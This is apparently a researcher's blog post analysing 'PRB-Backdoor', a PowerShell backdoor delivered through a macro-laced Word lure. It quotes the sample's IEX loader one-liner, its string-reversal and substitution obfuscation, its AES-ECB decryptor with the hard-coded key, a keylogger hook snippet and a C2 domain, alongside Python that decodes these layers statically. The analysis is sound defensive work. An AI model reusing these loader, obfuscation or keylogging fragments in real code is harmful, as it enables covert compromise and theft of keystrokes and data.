PRB-Backdoor - A Fully Loaded PowerShell Backdoor with Evil Intentions


The great people at ClearSky reached out to me a couple of days ago regarding a sample that they suspected could be related to MuddyWater. 

They suspected so because the sample had some similarities with the way MuddyWater lures look, and some similarities in the PowerShell obfuscation, specifically the character substitution routine.
MuddyWater Sample

New Sample
However, after analyzing the sample and investigating it further, I was able to show that this is indeed something different, but nonetheless interesting. This blog is a walk-through of my analysis and highlights initial insights into this potential attack.


The sample that was shared with me is a macro-laced Word document called "Egyptairplus.doc" with an MD5 hash of fdb4b4520034be269a65cfaee555c52e. The macro code contains a function called Worker() which calls multiple other functions embedded in the document to ultimately run a PowerShell command:
"powershElL -EXEC bypASS -COmMaND "& {$pth='\Document1';$rt='';$Dt=geT-cOntEnt -patH $PTH -eNcoDInG aSCIi;FOrEach($I in $DT){iF ($I.Length -Gt 7700){$rt=$i.sPLIt('**')[2];BREak}};$rt=[syStEm.TExT.eNCODing]::asCII.gEtsTrIng([sysTEm.ConverT]::FROmbaSe64sTriNG($rT));IEX($RT);}"
This command looks for a chunk of data that is embedded in the document itself and begins with "**", then Base64-decodes that chunk. The result is a PowerShell script that looks like this:
function main
{
... Truncated code...
    [string]$decode = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($content))
    iex $decode
}
Replacing iex with Write-Output and running this code results in the second-layer PowerShell script shown earlier in the blog, which has similarities with MuddyWater code due to its use of the character substitution functions. Below is a snippet of the code:
function z0w2uPeX($sKPv){
    $sKPv = $sKPv.ToCharArray()
    [array]::Reverse($sKPv)   # reverse the characters; without this step the -f pieces below do not decode
    $G8JdH = -join($sKPv)
    return $G8JdH
}
function FQdZ7EqW($fpuD){
    # character substitution: the #x# placeholders stand in for characters that are awkward inside the format strings
    $fpuD = $fpuD.Replace('#a#', "`n").Replace('#b#', '"').Replace('#c#', "'").Replace('#d#', "$").Replace('#e#', "``")
    return $fpuD
}
# Each line assembles a statement with the -f format operator, substitutes the placeholders and runs it
iex(FQdZ7EqW("{4}{5}{6}{1}{2}{0}{3}" -f (z0w2uPeX("1 sd")),"Se","con","0","S","tart-Slee",(z0w2uPeX("- p")), 0))   # decodes to: Start-Sleep -Seconds 10
iex(FQdZ7EqW("{2}{1}{5}{0}{4}{3}" -f (z0w2uPeX(" yeWs60")),(z0w2uPeX("ob")),"[","e",(z0w2uPeX("urT#d# =")),"ol]#d#gS", 0))   # decodes to: [bool]$gS06sWey = $True
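As an added example (not code from the sample or from the original post), the Python below emulates both stages described so far: the macro one-liner's extraction of the Base64 chunk from the document, and the second-layer reverse/character-substitution scheme, so the iex lines can be decoded statically instead of being executed. The hidden document line and the stage-2 script used as input are constructed stand-ins; the two obfuscated lines are the ones quoted above.

```python
import base64
import re

# --- Stage 1: what the macro's PowerShell one-liner does with the document ---
# Constructed stand-in for the hidden document line: filler, the "**" marker, then
# the Base64 payload. Nothing beyond those facts is known about the real line.
STAGE2_SCRIPT = "function main {\n    iex $decode\n}"
HIDDEN_LINE = "x" * 7701 + "**" + base64.b64encode(STAGE2_SCRIPT.encode()).decode()

def extract_payload(doc_lines, min_len=7700):
    """First line longer than 7700 chars -> .Split('**')[2] -> Base64-decode."""
    for line in doc_lines:
        if len(line) > min_len:
            # PowerShell's String.Split('**') splits on the *characters* '*', so
            # "a**b" -> ["a", "", "b"]; index [2] is the text after the marker.
            return base64.b64decode(line.split("*")[2]).decode("ascii")
    return None

# --- Stage 2: the string-reverse / character-substitution obfuscation ---
SUBST = {"#a#": "\n", "#b#": '"', "#c#": "'", "#d#": "$", "#e#": "`"}

def z0w2uPeX(s):          # the sample's helper: reverse the string
    return s[::-1]

def FQdZ7EqW(s):          # the sample's helper: swap placeholders for real characters
    for marker, ch in SUBST.items():
        s = s.replace(marker, ch)
    return s

LINE_RE = re.compile(r'iex\(FQdZ7EqW\("([^"]*)"\s*-f\s*(.*)\)\)\s*$')
ARG_RE = re.compile(r'\(z0w2uPeX\("([^"]*)"\)\)|"([^"]*)"|(\d+)')

def decode_line(line):
    """Statically evaluate one iex(FQdZ7EqW("fmt" -f ...)) line instead of running it."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    fmt, arglist = m.groups()
    args = [z0w2uPeX(a.group(1)) if a.lastindex == 1 else a.group(a.lastindex)
            for a in ARG_RE.finditer(arglist)]
    # PowerShell's -f is String.Format: each {n} becomes the n-th argument.
    return FQdZ7EqW(re.sub(r"\{(\d+)\}", lambda f: args[int(f.group(1))], fmt))

# The two obfuscated lines quoted above, verbatim.
OBFUSCATED = r'''iex(FQdZ7EqW("{4}{5}{6}{1}{2}{0}{3}" -f (z0w2uPeX("1 sd")),"Se","con","0","S","tart-Slee",(z0w2uPeX("- p")), 0))
iex(FQdZ7EqW("{2}{1}{5}{0}{4}{3}" -f (z0w2uPeX(" yeWs60")),(z0w2uPeX("ob")),"[","e",(z0w2uPeX("urT#d# =")),"ol]#d#gS", 0))'''

def decode_all(text=OBFUSCATED):
    return [decode_line(l) for l in text.splitlines() if l.strip()]
```

Running `decode_all()` yields the two plain statements, which is the same output the Write-Output trick produces but without executing any of the sample's code.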
Once you replace all of the iex calls with Write-Output, you end up with more readable code, as shown below.
This code still contains encoded chunks of data. Two interesting pieces are Invoker.ps1 and js.hta.
The Invoker.ps1 script is used to decrypt the main Backdoor code as shown below:
$nxUHOcAE = "0ef4b1acb4394766" # This is the key used to decrypt the main backdoor code (16 bytes, i.e. AES-128)
$xWCWwEep = "{path}"            # path of the Base64-encoded, encrypted blob
[string]$BJgVSQMa = Get-Content -Path $xWCWwEep -Force
# The type name is missing from the snippet; the settings below (128-bit block and key, ECB, zero padding) are those of a Rijndael/AES object, so RijndaelManaged is assumed here
$nl3hMTam = New-Object System.Security.Cryptography.RijndaelManaged
$nl3hMTam.Mode = [System.Security.Cryptography.CipherMode]::ECB
$nl3hMTam.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
$nl3hMTam.BlockSize = 128
$nl3hMTam.KeySize = 128
$nl3hMTam.Key = [System.Text.Encoding]::UTF8.GetBytes($nxUHOcAE)
$W9NYYLlk = [System.Convert]::FromBase64String($BJgVSQMa)
$Oj5PebcQ = $nl3hMTam.CreateDecryptor();
$mL9fRirD = $Oj5PebcQ.TransformFinalBlock($W9NYYLlk, 0, $W9NYYLlk.Length);
[string]$Pru8pJC5 = [System.Text.Encoding]::UTF8.GetString($mL9fRirD).Trim('*')   # zero padding removes nothing on decrypt, so the '*' fill is trimmed explicitly
Write-Output $Pru8pJC5 # I replaced iex with Write-Output
Start-Sleep -Seconds 3
When the encrypted backdoor code is passed through this script, it is decrypted into the full-fledged backdoor code. I am sharing a snippet of the code here, as the full code of the backdoor is over 2000 lines when properly formatted.
Notice the main function name, PRB, hence the name I have given it: "PRB-Backdoor".
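To reproduce the Invoker.ps1 stage offline, here is an added Python equivalent (not code from the sample or the original post) built on the pyca `cryptography` package: it applies the same key, AES-ECB, the no-op zero padding and the Trim('*') step. The `pack_like_sample` inverse and `SAMPLE_SCRIPT` are constructed only to produce test input; how the real blob was generated is inferred from the decryptor, not taken from the sample.

```python
import base64
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

KEY = b"0ef4b1acb4394766"   # the key hard-coded in Invoker.ps1; 16 bytes, i.e. AES-128

def _cipher(key):
    # The script's settings: 128-bit block and key, ECB mode. ECB turns identical
    # 16-byte plaintext blocks into identical ciphertext blocks, so repeated code
    # fragments in a 2000-line script leave visible repetition in the blob.
    return Cipher(algorithms.AES(key), modes.ECB())

def invoker_decrypt(b64_blob, key=KEY):
    """Reproduce Invoker.ps1: Base64-decode, AES-ECB decrypt, UTF-8 decode, Trim('*')."""
    data = base64.b64decode(b64_blob)
    if len(data) % 16:
        raise ValueError("blob is not a whole number of AES blocks")
    dec = _cipher(key).decryptor()
    plain = dec.update(data) + dec.finalize()
    # PaddingMode.Zeros strips nothing on decrypt, so whatever filled the last block is
    # still present; Trim('*') implies the plaintext was padded with '*' characters.
    # .NET's UTF8.GetString replaces malformed sequences (e.g. from a wrong key) with U+FFFD.
    return plain.decode("utf-8", errors="replace").strip("*")

def pack_like_sample(script, key=KEY):
    """Constructed inverse used only to build test input (an assumption about how the
    blob was produced): pad with '*' to a 16-byte boundary, AES-ECB encrypt, Base64."""
    raw = script.encode("utf-8")
    raw += b"*" * (-len(raw) % 16)
    enc = _cipher(key).encryptor()
    return base64.b64encode(enc.update(raw) + enc.finalize()).decode("ascii")

# Constructed placeholder standing in for the (2000+ line) backdoor script.
SAMPLE_SCRIPT = "function PRB {\n    param($cmd)\n    # constructed placeholder body\n}\n"
```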


Running the sample in a sandbox did not show any network communication. However, early in my analysis of the code I noticed a variable with the value $hash.httpAddress = "http://outl00k[.]net". This looks like the main domain that the backdoor communicates with for all of its different functions.
Doing a passive DNS and WHOIS lookup, we can get additional information on the domain:
Domain Name:
Registrar WHOIS Server:
Registrar URL:
Updated Date: 2018-04-25T03:32:22Z
Creation Date: 2018-01-01T11:35:58Z
Registrant Name: Simon Nitoo
Registrant Street: Tehran
Registrant City: Tehran
Registrant State/Province: Tehran
Registrant Postal Code: 231423465
Registrant Country: IR
Registrant Phone: +98.2189763584
Registrant Email:
Registry Admin ID:  
Admin Name: Simon Nitoo
Admin Street: Tehran
Admin City: Tehran
Admin State/Province: Tehran
Admin Postal Code: 231423465
Admin Country: IR
Admin Phone: +98.2189763584
Admin Email:
Registry Tech ID:  
Tech Name: Simon Nitoo
Tech Street: Tehran
Tech City: Tehran
Tech State/Province: Tehran
Tech Postal Code: 231423465
Tech Country: IR
Tech Phone: +98.2189763584
Tech Email:
Name Server:
Name Server:
The registrant email address is also used for another domain, LinLedin[.]net.
Both domains are currently resolving to the following IP addresses:
outl00k[.]net - 74.91.19[.]118 up until May 10, 2018
LinLedin[.]net - 5.160.124[.]99 on April 30, 2018
As of the writing of this blog, there doesn't seem to be much information about either of those domains. 


I have yet to go through the whole code of the backdoor; however, below is an initial look at its functionality based on my analysis so far.
PRB-Backdoor has the following functions:
  • PRB-CREATEALIVE and PRB-CREATEINTRODUCE - these two functions seem to be related to initial communication and registration with the C&C
  • PRB-HISTORY - looks to grab the browsing history from different browsers, including Chrome, IE and Firefox; it uses a sub-function called GET-HISTORY
  • SNAP - takes a screenshot of the screen
  • sysinfo - gets the system information
  • And many more functions.
At some point in the code there are even what appear to be .NET/C# code snippets, embedded as a PowerShell here-string:
$dsc = @"
using System;
using System.IO;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Windows.Forms;
using System.Text;

namespace dDumper
{
    public static class Program
    {
        // WH_KEYBOARD_LL and the WM_*KEY* message constants are the ones used by a
        // low-level keyboard hook (SetWindowsHookEx), i.e. keystroke logging
        private const int WH_KEYBOARD_LL = 13;
        private const int WM_KEYDOWN = 0x0100;
        private const int WM_SYSTEMKEYDOWN = 0x0104;
        private const int WM_KEYUP = 0x0101;
        private const int WM_SYSTEMKEYUP = 0x0105;
        // ... remainder of the class truncated ...
    }
}
"@


The PRB-Backdoor seems to be a very interesting piece of malware, designed to run on the victim machine and gather information, steal passwords, log keystrokes and perform many other functions. I could not find any reference to the backdoor or its code in any public source.
I would imagine there are other lures and samples out there, and hopefully other researchers will be able to dive deeper into the code and reveal additional details. I will do so as soon as I have additional time, but I thought it would be beneficial to share these initial findings in the hope of shedding some light on this activity.